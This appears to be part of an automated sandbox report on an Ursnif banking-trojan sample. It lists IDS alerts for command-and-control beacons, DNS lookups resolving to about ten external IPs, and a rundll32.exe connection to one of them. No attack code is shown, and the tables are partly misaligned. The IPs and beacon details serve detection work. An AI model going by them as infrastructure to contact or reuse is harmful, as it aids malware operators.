Language of compilation system | Country where language is spoken |
---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
01/24/22-11:10:28.654587 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.6 | 91.203.174.38 |
01/24/22-11:10:31.338927 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.6 | 138.36.3.134 |
01/24/22-11:10:33.943277 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49762 | 80 | 192.168.2.6 | 211.40.39.251 |
01/24/22-11:10:34.818253 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49763 | 80 | 192.168.2.6 | 61.98.7.132 |
01/24/22-11:10:34.818253 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.6 | 61.98.7.132 |
01/24/22-11:10:40.364011 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49764 | 80 | 192.168.2.6 | 91.203.174.38 |
01/24/22-11:10:40.364011 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49764 | 80 | 192.168.2.6 | 91.203.174.38 |
01/24/22-11:10:42.969883 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49765 | 80 | 192.168.2.6 | 121.136.102.4 |
01/24/22-11:10:42.969883 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49765 | 80 | 192.168.2.6 | 121.136.102.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 24, 2022 11:10:28.414808035 CET | 192.168.2.6 | 8.8.8.8 | 0xe190 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:31.052858114 CET | 192.168.2.6 | 8.8.8.8 | 0x930a | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:33.445388079 CET | 192.168.2.6 | 8.8.8.8 | 0x78b9 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:34.169456959 CET | 192.168.2.6 | 8.8.8.8 | 0x8b6 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:40.163948059 CET | 192.168.2.6 | 8.8.8.8 | 0xea12 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 24, 2022 11:10:42.621546030 CET | 192.168.2.6 | 8.8.8.8 | 0x8a50 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:28.483218908 CET | 8.8.8.8 | 192.168.2.6 | 0xe190 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:31.122343063 CET | 8.8.8.8 | 192.168.2.6 | 0x930a | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) | ||
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:33.609316111 CET | 8.8.8.8 | 192.168.2.6 | 0x78b9 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:34.354336977 CET | 8.8.8.8 | 192.168.2.6 | 0x8b6 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:40.183387041 CET | 8.8.8.8 | 192.168.2.6 | 0xea12 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 121.136.102.4 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 222.236.49.123 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 151.251.30.69 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 37.34.176.37 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 138.36.3.134 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 91.203.174.38 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 211.169.6.249 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 61.98.7.132 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 186.182.55.44 | A (IP address) | IN (0x0001) |
Jan 24, 2022 11:10:42.691263914 CET | 8.8.8.8 | 192.168.2.6 | 0x8a50 | No error (0) | 211.40.39.251 | A (IP address) | IN (0x0001) |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.6 | 49760 | 91.203.174.38 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 24, 2022 11:10:28.654587030 CET | 1047 | OUT | |
Jan 24, 2022 11:10:29.617388964 CET | 1048 | IN | |